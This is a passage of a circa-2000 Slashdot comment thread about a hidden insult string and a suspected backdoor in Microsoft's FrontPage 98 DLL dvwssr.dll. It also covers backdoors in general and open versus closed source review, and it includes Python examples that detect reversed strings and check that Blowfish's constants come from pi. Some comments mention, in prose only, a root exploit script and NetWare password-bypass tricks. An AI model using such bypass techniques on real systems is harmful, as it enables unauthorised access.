    This could not possibly have "slipped by" code reviewers. You cannot miss something like that key phrase sticking out like that, I don't care how tired you are. The only reason that DLL made it into the final release is because the higher-ups WANTED IT THERE. They KNEW about it, they AUTHORIZED it, and they damn sure aren't going to fire anyone over it unless some VP decides they need a patsy. Their source code may be closed to all of us out here in the bleachers, but internally their engineers would have been all OVER that in a heartbeat... IF they weren't being told to put it in in the first place.

    I will never trust a Microsoft product again.


    "The best weapon of a dictatorship is secrecy, but the best weapon of a democracy should be the weapon of openness."
    --

  85. What about competitors of MS who used IIS? by Sxooter · · Score: 1

    Can you imagine being a competitor of MS's and running IIS? Microsoft could just walk right into your web server and steal damned near anything they want. Gods help you if they found a way around your firewall. But of course, Microsoft has been so ethical in the past that I'm sure they'd never do something like that...

    --

    --- It is not the things we do which we regret the most, but the things which we don't do.
  86. Re:Backdoors in "secure software" by Centove · · Score: 1

    I'm sorry, but a mission critical system I _will_ have physical access to, given physical access to a system and if you can't get in or otherwise restore the system to a working state then something is really wrong.
    The problem with backdoors is no matter how well hidden/protected they _will_ be found. Once found they _will_ be exploited.

  87. Re:It's in more than one dll by MochaMan · · Score: 1

    The string also appears in the DLL Mtd2lv.dll

    Correction, that should be MDT2LV.DLL. But you're right, it is there as well! I'd be curious to see how many thousands more of these there are?

  88. Re:ESR is wrong?? by MochaMan · · Score: 1

    Just because the likes of Micro$oft cannot be bothered to use this stuff, does not mean that closed source can -never- deliver quality or security. It just costs more.

    Agreed; however, who says that the CMM can't be applied to open source software as well? In all honesty, companies that are stringent in their code review are most likely developing critical systems. If such systems are developed by the open source community, there is no reason why some form of rigorous peer review could not be applied. However, open source code has the additional advantage of unstructured peer review to begin with.

    While I agree that closed source software can achieve very low bugginess through rigorous peer review, open source code still has the advantage.

  89. Re:Not MS policy by Wah · · Score: 1

    Anything included with a Distribution is fair game for its bugs, and any possible improvement thought up should be included on the list. I.e. establish the same criterion used with Windows 2000.

    No they shouldn't be compared using the same criterion. You are *paying money* for M$ software and should demand it to be vastly superior in every way. As well as constantly improving. Linux is done for a different reason (good software vs good bottomline). It's sad that even though the two shouldn't really be compared, Windows still comes up short. (outside of emulating an arcade)

    --

    --
    +&x
  90. Re:Heaven's Gift? (Obvious Troll) by Wah · · Score: 1

    not only that, you get to cite MS vs DOJ and say they used their monopoly power to force you to use their software. I can hear the saliva from a million lawyers meandering towards the golden goose that is BillyG.

    --

    --
    +&x
  91. Re:Backdoors in "secure software" by LarsG · · Score: 1

    Backdoors aren't always a bad thing.

    Really? How can you ever trust a vendor that knowingly puts a backdoor in your system and "forgets" to tell you about it (and more important, how to disable it)?

    IMHO, the only kind of backdoor that is acceptable, is one that can only be used if you have physical access to the box. With physical access, it is possible to do anything with the box anyway. It is thus convenient to have a _documented_ backdoor for those forgot-the-password situations. For example the backdoor in Cisco routers.

    Any kind of undocumented backdoor that is exploitable over a network is braindead. You often end up with a scenario where the backdoor is known by black-hats, the vendor keeps radio silence, and us poor network admins have huge gaping holes that we don't know about and can't close.

    Maybe MS did a good thing here, maybe not.

    In no way is this a good thing if you are responsible for network security.

    --
    If J.K.R wrote Windows: Puteulanus fenestra mortalis!
  92. Not as big a threat as first thought! by pixelbeat · · Score: 1

    http://www.idg.net/idgns/2000/04/14/MSBackdoorServerThreatLessSerious.shtml

  93. Re:Now that's professional... by brandond · · Score: 1
    And to say that "well, it doesn't affect 2000" is no better. I have to ask at that point, "Why? Did you come up with something even funnier for 2000?"


    This time around it's "the DOJ lawyers are a bunch of weenies".

    -----

  94. Katz? Is that you? by Tim+C. · · Score: 1

    :-)

  95. It's probably IIS by battery841 · · Score: 1

    My friend has a friend who is a security expert. This guy has written MANY exploits for many programs. A few weeks ago my friend came up to me and said that his friend found a backdoor in IIS and that he was working on an exploit for it. I'd make a bet this is it. From what it sounded like, this wasn't NSA but made for more Microsoft access. Yeah, I think it's just IIS.

    1. Re:It's probably IIS by witz · · Score: 1

      Nope, sorry, it's just the 98 extensions. This DLL isn't present in just IIS 4.0, and it isn't present if you install the 2000 extensions. This DLL is only present if you install the Front Page 98 extensions.

  96. Re:Uh ... by knarf · · Score: 1
    IF this is true, I still don't understand how Microsoft thinks they have any business releasing software with Internet functionality anymore. Intranet, sure. Internet? No way.

    Erm, might I remind you that the vast majority of security breaches come from the INSIDE of the network/company/megacorp? This is why the concept of perimeter defence utterly fails to protect resources against those most willing and able to exploit flaws (and this is a security flaw, no matter whether it was put there intentionally or not). So Microsoft (or any other producer of shoddy wares) has no more business releasing software for use on the internal network than they have on the perimeter or outside of it.

    Of course, they in fact generate a lot of business doing exactly that, but that is another story.

    --
    --frank[at]unternet.org
  97. Re:Taking a bomb on a plane by Ventilator · · Score: 1

    Way cool idea!
    Next time I drive my car, I'm gonna hit some trees on purpose so that I won't hurt anybody else by accident.

    --
    --- If OS were buildings, then the first woodpecker to come around would erase 95 % of civilization.
  98. MicroShaft... by laptop006 · · Score: 1

    I'd have to say that ANY machine connected to the web is insecure, look at the Orange Book specs, especially for things like NT...
    I'm not against microsoft, only in the server department, but until I have seen it with my own eyes I will not believe that any machine connected to the Internet, or even any network is secure.

    -0-0-0-0-0-0-0-0-0-
    Laptop006
    Melbourne, Australia

    --
    /* FUCK - The F-word is here so that you can grep for it */
    1. Re:MicroShaft... by atopian · · Score: 1

      Correction on that one... Even if not connected to the net the machine isn't secure if it's out in the middle of say a public square. I had this debate with some friends a while back, and we decided that the only safe data is one that doesn't exist.

      However that isn't really useful ;) So the only safe functional machine was one that involved mountains, bunkers, UNIX, and guillotines (don't ask). Oh yeah and an administrator who knew what he was doing.

      Hopefully someone will get the twisted humor in that ;)

      --
      Hrm loving these .sigs :P
  99. And would be sue-proof by MadAhab · · Score: 1
    under the UICTA...

    But seriously, if a large number of sites suddenly got hacked through this, it could spell a whole new wave of wrath and doom rolling over Redmond.

    My favorite part in the ZD article is where Microsoft says, basically, "Oh, but wait, we were gonna tell you about that!" It's a classic response of a liar getting caught, and one that a naive 6yo wouldn't buy...

    --
    Expanding a vast wasteland since 1996.
  100. Re:Backdoors in "secure software" by twinpot · · Score: 1

    Not really a backdoor in the truest sense, as you had to either copy it to the server and get remote console access, or load it from a floppy while sitting in front of the server console. I used it, and several other password checkers. Another that required machine access would nuke the bindery, which gave the default supervisor with no password option - you then had to recreate all the users. Another way was to rename the SYS volume and create another (SYS) volume, always assuming you didn't store actual data on it.

    This is no different from some of the methods you can use to get into a *nix system.

  101. Fixed in 2000? by Srass · · Score: 1

    Does the fact that the backdoor is fixed in 2000 mean that Microsoft actually found it quite some time ago, and never issued an advisory? Just wondering.

  102. Re:Backdoors in "secure software" by Chandon+Seldon · · Score: 1

    Yes, but the backdoor would be unique to your machine, not forcing anyone who didn't want one to have a back door on their machine.

    --
    -- The act of censorship is always worse than whatever is being censored. Always.
  103. Re:yes??? by EasyTarget · · Score: 1

    tries to follow the CMM

    A nice thing about CMM is that it is not binary, there are different levels of 'following' it. We were level 5, pretty hard to achieve. This was audited on several occasions. Peer review again. Internal, cross-divisional internal and external (we passed audits at L5 from all three). The toughest was the cross-divisional, nothing like a bunch of engineers from a L2 division trying to prove that our rating was a pack of lies.

    Would you know if there was something dangerous like this lurking in your closed source code?

    Probably, at L5 we had tight configuration management, in a package a wee bit more secure than CVS (cough *ClearCase* cough). It would take a reasonable conspiracy because coder and integrator are different. Review is done on the files once they are under CM control, and the perps would be traceable even years down the line, unless you could get a savvy sysadmin to join in.

    It's not impossible, but pretty damn difficult, and the same can be said for open-source, as other posters have pointed out.



    EZ
    -'Press Ctrl + Alt + Delete to log on..'

    --
    "Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
  104. Re:If it were open source ... by greenrd · · Score: 1
    And it would have been removed from the code long ago.

  105. Re:Backdoors in "secure software" by Steve+G+Swine · · Score: 1

    If an engineer puts 100 hours of work into hiding it, it only takes 100 people 1 hour of searching to equal that effort.

    We've shown your picture to 300 women around the world. Expect your baby tomorrow.

    --
    "Consider yourself a member of a virtual corporation with Mr. Torvalds as your Chief Executive Officer." - Linux Advocac
  106. Pentium III backdoor by sicrik · · Score: 1

    found encoded in the Pentium III architecture: moc.nsm@setagb liame emit doog a rof
    No security holes have been attributed to this. This may or may not be contrary to anything I said in the past.

    --
    -- An image is worth about 2.5E4 characters.
  107. Ah Micros~1 Frontpage Server extensions... by ronfar · · Score: 1
    ...we meet again.

    Ok, for those of you who don't know, the FrontPage Server extensions are basically intended to take the place of things which are commonly done by server scripts.

    Fortunately, due to an internal policy change at the company we are no longer using the FrontPage server extensions (something I've advocated throughout my tenure here) but when we started we had to use them. Their operation is of course the typical Micros~1 "mystery wrapped in a riddle wrapped in an enigma" approach to software, but they seem to use <!-- --> style comments as markers in the Web pages that use them. (FrontPage is designed so that you can create Web pages even if you couldn't write a single line of HTML.)

    I hate FrontPage, when my boss isn't looking I use emacs or Notetab on Windows boxes.

    --
    All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
    1. Re:Ah Micros~1 Frontpage Server extensions... by MsGeek · · Score: 1

      >I hate FrontPage, when my boss isn't looking I
      >use emacs or Notetab on Windows boxes.

      The only thing FrontPage98 is good for is converting Word documents to HTML. That's it. Period! !Puente! And even then, you have to open the resulting file in a text editor to fix a few minor bits of Micro-cruft.

      I actually sat down to go through a tutorial on FP98 on Techies.Com, and I quit in disgust after the first few pages. Using FrontPage of any vintage to write pages is really, really bad form.

      MK-H

      --
      Knowledge is power. Knowledge shared is power multiplied.
  108. Re:As for the password...... by ronfar · · Score: 1
    Remember the strike episode of the Simpsons?

    Remember how Mr. Burns goes to the master switch and says, "From Hell's Heart, I stab at thee, Springfield," and shuts off all the power?

    Maybe this was intended to be Mr. Gates' master switch, in case things went really bad for him after all his appeals...

    --
    All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
  109. Re:That's what #ifdef _DEBUG is for by ronfar · · Score: 1
    Actually, in my opinion there is nothing wrong with having backdoors in games software... provided it's running on something like a Nintendo or the "backdoor" is just a cheat/debug code.

    I mean, heck, a lot of people think Contra is more fun after you input the Konami code... otherwise it's too hard.

    Oh, and it is even more cool when you put the Konami code into a game by a competitor (I forget which one) and it instantly kills you and puts text up on the screen which says, "This is not Konami."

    --
    All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
  110. Re:What took so long? by jcr · · Score: 1

    If you worked in QA at MicroSquish, then maybe you can tell us how this crap gets shipped? Doesn't Micro~1 QA have the power to veto a shipment? -jcr

    --
    The only title of honor that a tyrant can grant is "Enemy of the State."
  111. You are right, sadly... by The+Queen · · Score: 1

    However, I think very visible companies/distributions like Redhat and Mandrake are gaining a (gasp!) brand identity that people will likely be more accepting of as more M$ poo is unveiled in the media.

    We bought our copy of Mandrake at Wal-Mart. ;-)


    The Divine Creatrix in a Mortal Shell that stays Crunchy in Milk

    --

    The House Between - Original Sci-Fi Series
  112. Cpyders quick and dirty analysis by Cpyder · · Score: 1

    I don't know about the backdoor stuff, but when I quickly load this stuff in some stupid editor I see this:

    /global.asa .asp !seineew era sreenigne epacsteN HTTP/1.0 404 Object Not Found ...
    As you can see, the weenies thing is definitely in there, just spelled backwards.
    _
    / /pyder.....
    \_\ sig under construction

  113. NSA Key by Yebyen · · Score: 1

    Does anyone else remember the NSAKey? I read this, and NSAKey was the first thing to come to mind.

    --
    linuxisgood:~$ man woman

    --
    Restating the obvious since nineteen aught five.
    1. Re:NSA Key by Cratylus · · Score: 1
      Yes, we all remember the NSA Key non-issue. The rest of us read the articles that followed and realized that this was not some "backdoor" into the Crypto-API for the NSA. It was just a poorly named entry.

      From Microsoft's response:
      Why is the backup key labeled "NSA key"?
      This is simply an unfortunate name. The NSA performs the technical review for all US cryptographic export requests. The keys in question are the ones that allow us to ensure compliance with the NSA's technical review. Therefore, they came to be known within Microsoft as "the NSA keys", and this was used as a variable name for one of the keys. However, Microsoft holds these keys and does not share them with anyone, including the NSA.

  114. Re:Ye gods. by Repton · · Score: 1
    Bob Ince noted:
    There's nothing up on microsoft.com about it yet either, which also strikes me as strange.

    There doesn't seem to be anything in the NTBugtraq or NTSecurity archives on it either (search for dvwssr.dll turned up nothing).

    OTOH, people here have run strings on the file and it has turned up the phrase... so...?

    --
    Repton.

    --
    Repton.
    They say that only an experienced wizard can do the tengu shuffle.
  115. Re:Well done by cfish · · Score: 1

    Yeah but I don't believe that its intention is to hurt MS. Every line of the code should be traced back to whoever wrote it on MS version control system. Unless if someone hacked into them and created this line from outside and think it would be fun to stir more interesting news. I think that's more likely the case.

    Who will possibly risk getting fired to put something like this in?

  116. Re:Linux has frontpage extensions? by NtG · · Score: 1

    I'm not a troll, and my personal opinion of you is that you are a rather misinformed so-called 'security expert'. If you are indeed a security expert, why do you then have to remove services from customers for which you aren't skilled enough to audit and secure yourself?

    Microsoft have no reason to put security backdoors in their own software. I think you will find that on the MS side of the fence, there is a lot less competition than you think. Sure, they call Netscape engineers weenies.. Weenie is the nicest thing I've heard an MS engineer called on here. And no, they're not stupid. In fact, if they were stupid my friend, they would be doing your job (cleaning up after other people.. the janitor of computing).

  117. Re:Linux has frontpage extensions? by NtG · · Score: 1

    And for that I hope you were FIRED

    I don't have time to respond to all the uneducated posts within this story. All I can say is, with your mindless anti-MS bullshit to try and get the acceptance of others, you only prove that you are not experienced in any other OSes, and would be a particularly incompetent admin.

  118. Re:Ye gods. by NtG · · Score: 1

    Moderation totals: -1 Not funny

  119. Re:Heaven's Gift? by trelyle · · Score: 1

    I run Linux at home, several co workers do, the head of ops runs it. I have personally seen linux boxes cracked in 3 seconds. Net BSD seems quite possible though.

    --
    "A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
  120. Re:Heaven's Gift? by trelyle · · Score: 1

    I work for a mid sized ISP. We host a small number of commerce sites using IIS and MSSQL. Most of our customers use FP98 or some variant to maintain/screw up their pages. Part of the frustration in hearing of backdoor issues like this involves the cost of migrating away from NT based hosting. Think of it like this; we pay X amount of dollars to license NT and IIS to start off with. That's no small chunk. Then we spend a huge amount of hours designing and maintaining sites. Now, since we have spent all this money, well the board wants to squeeze its money's worth out of it. What kind of man hours are involved in making a *smooth* transition to a flavor of BSD for instance? And how do you rationalize the money spent on MS licensing? Kind of a catch 22, it is going to cost plenty... one way or another. That is what it boils down to for our company. Which one is going to be cheaper in the long run? That is not something any company (especially this one) is prepared to make quickly. Another quick point, this is the third time this week some type of *major* issue has been found with MS web hosting software. I do know that our ops dept is getting a bit cranky lately, and who blames them.

    --
    "A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
  121. Re:Ye gods. by trelyle · · Score: 1

    This .dll is located in the \Microsoft Front Page\version3.0\isapi\_vti_bin\_vti_aut .
    When opened up in a hex editor, the phrase is clearly there... and backwards. BTW, this is Win98, *not* NT. Ok, how does that affect me? Honestly, this is the first time I have run a .dll through a hex editor. What can I do with this?

    --
    "A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
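The check that comments 112, 114 and 121 describe (dumping the printable strings of the DLL and noticing that one of them only reads as English backwards), as an added example that is not part of the thread and not anyone's actual tooling. The byte string is constructed from the fragments quoted in comment 112 rather than taken from the real file, and the wordlist, thresholds and function names are assumptions.

```python
import re

# Small constructed wordlist for the demo; a real audit would load a full
# dictionary (an assumption, not something the thread specifies).
WORDS = {
    "are", "the", "not", "and", "for", "key", "found", "object", "global",
    "password", "secret", "admin", "engineers", "netscape", "weenies",
}

# Constructed sample: a few header-like bytes, then NUL-separated strings
# matching what comment 112 saw in an editor. Not the real DLL layout.
SAMPLE = (
    b"MZ\x90\x00"
    b"/global.asa\x00.asp\x00"
    b"!seineew era sreenigne epacsteN\x00"
    b"HTTP/1.0 404 Object Not Found\x00\xff\xfe\x00"
)


def printable_runs(data, min_len=4):
    """Return (offset, text) for each run of printable ASCII, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def word_hits(text):
    """Count alphabetic tokens of the text that appear in the wordlist."""
    tokens = re.findall(r"[a-z]{3,}", text.lower())
    return sum(1 for t in tokens if t in WORDS)


def find_reversed_strings(data, min_len=4, min_hits=2):
    """Flag strings that contain more dictionary words reversed than forward.

    A string stored backwards scores zero forward and several hits reversed,
    while ordinary strings (paths, HTTP status lines) score the other way.
    """
    findings = []
    for offset, text in printable_runs(data, min_len):
        forward = word_hits(text)
        backward = word_hits(text[::-1])
        if backward >= min_hits and backward > forward:
            findings.append((offset, text, text[::-1]))
    return findings


if __name__ == "__main__":
    for offset, raw, decoded in find_reversed_strings(SAMPLE):
        print(f"offset 0x{offset:04x}: {raw!r} reads backwards as {decoded!r}")
```

Finding such a string only shows that a constant is embedded in the binary; as comments 79 and 130 note, what the code does with it still has to be established separately.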
  122. Re:Heaven's Gift? by trelyle · · Score: 1

    Listen putz, when I say I have seen it cracked in three seconds, I was talking about my own box. I am *not* making up numbers. Mandrake 7.0 , no PAM update or even mention of it anywhere on Mandrake site at the time, and it took longer for pamslam script to be downloaded than it took for it to give root access. After a bit of research it was fixed, but not before wiping the machine totally.

    (Sorry to flame, but had a bad day and really don't appreciate being told anything about making up numbers)

    --
    "A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
  123. Re:Not MS policy by Our+Man+In+Redmond · · Score: 1

    My point was that somebody is going to get fired, loudly and publicly, over this. Almost certainly whoever put it into the code (you're right on that score), and very possibly his program manager. They're going to want to present the public with the idea that this was something that one guy slipped in rather than something that was mandated by policy -- which in fact I believe to be the case. They are then going to say, in effect, "It's OK now, he's gone, so this is never going to happen again" -- which in fact I don't believe for a minute.

    You may be right about the Hotmail thing. I don't know. But you also have to remember that Hotmail is sort of this incidental little service off in the middle of nowhere where they don't even use Windows NT, fercryinoutloud. People do occasionally get fired for lesser crimes than this. (I almost did once, but that's another story for another time.) (They also get promoted for greater crimes than this, but that's yet another story for yet another time.)
    --

    --
    Someone you trust is one of us.
  124. More MS professionalism by Mai+Longdong · · Score: 1

    After the communist Chinese version of Win98 came out, it was found that MS's Taiwan coders had planted a little surprise for their brethren across the Taiwan Straits... at certain times during the year a Taiwanese flag would appear on the desktop and "Screw the Communists" (or words to that effect) would scroll across the screen. I thought it was kind of cute but apparently neither MS nor the commies did.

  125. Re:Not MS policy by Spittoon · · Score: 1

    This back door sounds more like a temporary measure that wasn't removed when it came time to ship, rather than some malicious thing perpetrated by a "rogue coder."

  126. Not as widespread as indicated by jake_the_blue_spruce · · Score: 1

    I just went and cleaned all our internal servers.
    I'm not being really responsible in verifying my facts, but this is what it looks like from initial survey.
    The dvwssr.dll is indeed installed on machines which have Frontpage 98 *Application* installed. On machines that only had FP98 *server extensions*, I didn't find the file. If you upgraded to frontpage 2000 from 98, the file doesn't appear to be removed, so the bug stays. However, you should *never* ever install frontpage on a production server exposed to the internet. It's buggy and terribly insecure even without this one hole. The protocol is a mess. It's little better than basic authentication over non-SSL connection for eavesdroppers getting passwords.

    --
    "There's so much left to know/ and I'm on the road to find out." -Cat Stevens
  127. Class Action Opportunity by Battra · · Score: 1

    Now that Microsoft is officially an illegal monopoly, and we now know that they intentionally put this back door in their software, it only reinforces that consumers actually are hurt by Microsoft's poor judgement.

    If we can demonstrate harm done from this, I think that MS just might find themselves facing a huge class action lawsuit.

    Slashdot (et al.) v. Microsoft, anyone?

  128. Re:Ye gods. by __u63 · · Score: 1

    There's nothing up on microsoft.com about it yet either, which also strikes me as strange. Is this really true? If so, it must be the security howler of the year.
    The details were AFAIK posted to BUGTRAQ either today or yesterday, and there have been about 5 emails about it since. This vulnerability is probably true.

  129. Re:Affects "almost every Web-hosting provider." by deKernel · · Score: 1

    So as far as I can gather, you basically don't have a clue.

    "Yes, Mr SoAndSo,
    No, I do not want your business and money, and please quit calling me."

    You must not live in the real world to make such a stupid comment. Whether you like it or not, you have to live with Microcrap!!!

  130. Re:What took so long? by TheGeek · · Score: 1
    What it really is...the phrase is the key to poor encryption based on an unbelievably simple string list.

    The fact that you now know the key to that encryption (which is not a one-way encryption like a linux passwd entry), _may_ allow you to decipher further backdoors into the server and others' websites...but in this case ONLY if you are already a user on that server, using Frontpage98 for your website, which will contain a copy of the dll file in question.

    If anyone cares to decipher the code, it is on SecurityFocus.org...included in the listing of the original submission of the bug.
    TheGeek

    --

    TheGeek
    http://www.geekrights.org
    Kill the monkey
  131. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    I say bug, but it could be anything, from a hacker to a freak EM storm corrupting the system. And who said anything about a Unix system? That's not the only OS used in mission critical systems, y'know...

    --
    - Damnit, I'm dead Jim
  132. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    I couldn't agree more about remote backdoors being bad. However...

    I run a web server which is located at a site about 30 miles from my office. (for the record I don't drive). The only system running on that webserver that allows remote access is ssh running on a non-standard port. If, for some reason, the ssh daemon dies, I'm fucked. I have to get out to the site ASAP and get it back up. I don't want to do that. If there is a backdoor/exploit in Apache that would allow me to get ssh running again, I'd be much happier using that....

    --
    - Damnit, I'm dead Jim
  133. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    IMHO a lot of designed backdoors are possibly left from debugging during development, kinda like cheat modes in games...

    Do you really think that game developers want to spend hours getting to level 12 to check that the dragon you have to kill with the ion sword of famine coughs when you hit it 12 times with a haddock? Maybe some designed backdoors are there to allow developers to check features that would take a relatively long time to access using normal authentication procedures?

    --
    - Damnit, I'm dead Jim
  134. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    There is no way in hell I'd reboot this server...
    it takes about 10 minutes doing the memory check...

    --
    - Damnit, I'm dead Jim
  135. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    Also, wouldn't that be creating a backdoor?

    --
    - Damnit, I'm dead Jim
  136. Re:Backdoors in "secure software" by Godfree^ · · Score: 1

    If ppl know about the backdoor, it's all the more reason to go and find it. However, if they don't publicize it, fewer people will search for it.

    IMNSHO remote backdoors are usually (not always) bad, but backdoors that require physical access are more often than not useful in the event of a major system failure...

    When I was at school, all the sys admins went (both of them) on holiday at the same time, leaving me in control of the network (boy, did we play a lot of Quake that week). But, Murphy struck, and the system died. Being the clever ppl the system admins were, they decided not to give me passwords to the server (I did, however, have keys to every room in the school... including the girls changing rooms, shame I didn't have a webcam) so when the server started going wrong (it decided to stop ppl logging in) I had to cause the Netware Monitor program to die (they had a passworded screensaver) so I could fix the problem. I used a backdoor to fix the problem. Then I got suspended for hacking. The bastards.

    --
    - Damnit, I'm dead Jim
  137. Re:What took so long? by Cramer · · Score: 1

    Well, I can look at the source code for most (if not all) of the "Linux software" to see what it's doing... in the MS world, you have to go out of your way to track what the damned installer is blindly overwriting.

  138. Re:What motivates high quality? by Cramer · · Score: 1
    1. What does it take to get people/organizations to produce quality work?
    Simple: An economic imperative to do so.

    Business does what's best for business. I hate to sound like Katz but, this is "corporatism"... concepts like right and wrong, good and bad, and even legality are equated to dollars and decimal points. The only things that matter are stock valuations, revenues, and profits. I'm reminded of the "Splode" spoof-commercial from The Truth.

    Take the automotive industry for an example; automakers forego a $6 safety device in favor of paying the legal fees in the "statistically infrequent" cases where it would have saved lives. By extension, your life is worth six US dollars.
    [there are hundreds of examples like this.]
  139. Re:As for the password...... by Cramer · · Score: 1

    On a Microsoft OS _maybe_... try using IE on Solaris. You'll change your tune.

  140. Re:As for the password...... by Cramer · · Score: 1

    Oh don't get me wrong, they both suck. Netscape just sucks less.

  141. Re:actually... by dimator · · Score: 1

    Am I the only one that gets this? Freaking hilarious!!! This should be +5 funny, if you ask me.

    --
    python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
  142. TRUTH IS A DEFENSE by Lucite · · Score: 1

    Since you clearly know nothing about defamation law I will **sigh** be forced to fill you in. The ***TRUTH*** is an affirmative defense to a defamation action. As a matter of law you are not entitled to an undeserved reputation. Just take a look at what the weenies did with BrowserBloat 6.

  143. Re:Another nail in closed source software's coffin by omnicolor · · Score: 1

    A backdoor could be hidden in the numbers, but everyone is so paranoid about that happening that the people who write the algorithms use well known numbers that seem random. For example, blowfish initializes the key generation part with the hex values of the decimal part of pi. While it's possible for them to use that in some way to have a back door, it's not like DES where the people that created them are the ones that might be trying to get at your data.
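
The claim about Blowfish's constants can be checked independently, which is the whole point of choosing them that way. As an added example (not part of the original comment), this recomputes the hexadecimal fractional digits of pi with plain integer arithmetic and compares them with the first eight P-array initial words from the published Blowfish specification; the function names are this example's own.

```python
# First eight initial P-array words as listed in the published Blowfish specification.
BLOWFISH_P_INIT = [
    0x243F6A88, 0x85A308D3, 0x13198A2E, 0x03707344,
    0xA4093822, 0x299F31D0, 0x082EFA98, 0xEC4E6C89,
]


def arctan_inv(x, scale):
    """Return approximately scale * arctan(1/x), using the alternating
    Taylor series 1/x - 1/(3x^3) + 1/(5x^5) - ... in integer arithmetic."""
    term = scale // x
    total = term
    x2 = x * x
    n = 1
    sign = -1
    while term:
        term //= x2          # next odd power of 1/x, still scaled
        n += 2
        total += sign * (term // n)
        sign = -sign
    return total


def pi_fraction_words(count, guard_bits=64):
    """Return the first `count` 32-bit words of the fractional part of pi.

    Machin's formula: pi = 16*arctan(1/5) - 4*arctan(1/239).
    guard_bits absorbs the rounding error of the truncated divisions.
    """
    scale = 1 << (32 * count + guard_bits)
    pi_scaled = 16 * arctan_inv(5, scale) - 4 * arctan_inv(239, scale)
    frac = pi_scaled - 3 * scale          # drop the integer part (3)
    top = frac >> guard_bits              # keep only the trusted bits
    return [(top >> (32 * (count - 1 - i))) & 0xFFFFFFFF for i in range(count)]


def constants_match_pi(constants):
    """True if every word equals the corresponding word of pi's fraction."""
    return pi_fraction_words(len(constants)) == list(constants)


if __name__ == "__main__":
    for published, computed in zip(BLOWFISH_P_INIT, pi_fraction_words(8)):
        flag = "ok" if published == computed else "MISMATCH"
        print(f"{published:08X} {computed:08X} {flag}")
```

A table whose words fail this comparison would have to be explained by its designer, which is the property the comment is describing.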

  144. MSNBC article - MS admits bug by bloonr · · Score: 1

    http://www.msnbc.com/news/394839.asp


    When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry."

    heh.

  145. Re:Actual report - not as bad as it looked by bloonr · · Score: 1

    It's not that simple, and it seems that it's only exploitable by users who have already been granted web authoring permissions on the box.


    And if the IIS administrator is stupid enough to allow FP extensions on the box in the first place! We're an IIS shop, and we absolutely do NOT allow FP on any of the IIS servers in the DMZ. These extensions have a history of security problems.

    Besides, everyone knows that Visual Notepad beats the pants off of FrontPage. :)
  146. more information by Jafa · · Score: 1

    right here. A good write up by rain forest puppy.

    Jason

  147. Re:(OT) how were DES S boxes picked? by Tau+Zero · · Score: 1
    I've been having a dickens of a time finding references to this on the Web (here is an oblique reference to some of the facts), but the facts as I know them are:
    1. CIA director William Casey was dying of brain cancer
    2. Congress subpoenaed his testimony in regard to the Iran-Contra affair
    3. Casey was scheduled for brain surgery before his appearance
    4. This surgery didn't slow the progress of his disease, but it did destroy his speech centers
    5. Congress got nothing from him during his appearance (a directly foreseeable result of the surgery)
    I do not recall reading anything about the family asking for compensation; the man was dying anyway (he died very shortly afterwards), and I'm sure that payoffs are part of the spooks' usual and customary business practices.
    --
    Time is Nature's way of keeping everything from happening at once... the bitch.
  148. Re:Grounds for Netscape to sue ? by TrYcKeRiE · · Score: 1

    I agree, not only is it this 'security issue', but it is also childish name-calling.

    I think the NetScape engineers should stand up against this, it makes sense to me.

    I mean.., 'weenies', if it wasn't meant to be found.., they could've used a more 'insulting' insult surely hehe }:o)

  149. Inserted by someone who hates M$oft? by mattr · · Score: 1

    Isn't it more likely that someone who hates Microsoft (um, narrows down the field quite a bit..) intentionally inserted this? Anybody want to check other dlls for backwards text with a dictionary checker?

    >> a firing offense for the as yet unidentified employees.

  150. Er... by witz · · Score: 1

    I run a few NT IIS 4.0 servers with the 2000 extensions (never had the 98 extensions) and none of them even have this file. Is this only with the 98 extensions?

    -witz

  151. People... by witz · · Score: 1

    After doing some digging, it appears that this *only* affects IIS servers running the 98 extensions. The FP 2000 extensions have been out for more than a year. I'm not being apologist, but this certainly doesn't affect the scope of servers that Russ Cooper or several people here would lead you to believe.

    H:\>dir \\dntweb01\c$\dvw*.* /s
    Volume in drive \\dntweb01\c$ has no label.
    Volume Serial Number is 24B8-C93E
    File Not Found

    H:\>dir \\dntweb01\d$\dvw*.* /s
    Volume in drive \\dntweb01\d$ has no label.
    Volume Serial Number is 6CB0-8E2D
    File Not Found

    IIS 4.0 server with FP2000 extensions.

  152. Re:Don't be too complacent. by payn · · Score: 1

    "You can't be absolutely complacent, unless you both compile everything on your system from source and review all the source code before compiling."

    True. And even that doesn't help--unless, of course, you're absolutely perfect and there's no way a bug, backdoor, or easter egg could slip past you.

    But you can feel much _more_ secure with open-source software than closed-source, even if you don't study the source, or even compile it yourself. Because you know that other people have compiled it (at the very least, whoever built the .ppc.rpm and .deb packages...) and likely some people have looked it over. Whereas with Microsoft's source, you know for sure that nobody outside of Microsoft (and companies that have signed NDAs with Microsoft) has seen the source.

    When Microsoft releases something, they know people are going to hammer it and try to crash it, penetrate it, or otherwise make it fail. And their software is probably better than it would have otherwise been for this (scary thought, eh?). But they also know that nobody's going to recompile the source, much less study it. And their software is definitely worse than it could have been for this.

    --
    no .sig, no slogan
  153. Re:But only the wealthy can afford to be richeous. by payn · · Score: 1

    First, if you're fired for refusing to comply with an illegal order, you can sue for wrongful termination. And they know this, so you can just threaten it. Of course you'll want to start looking for a new job, but they're not going to fire you for that, or you can sue for retaliation.

    For that matter, once you start looking for a new job, you have lots of options. Put the backdoor in as ordered and then tell everyone about it anonymously. Make the backdoor not work. Go way over schedule in implementing it.

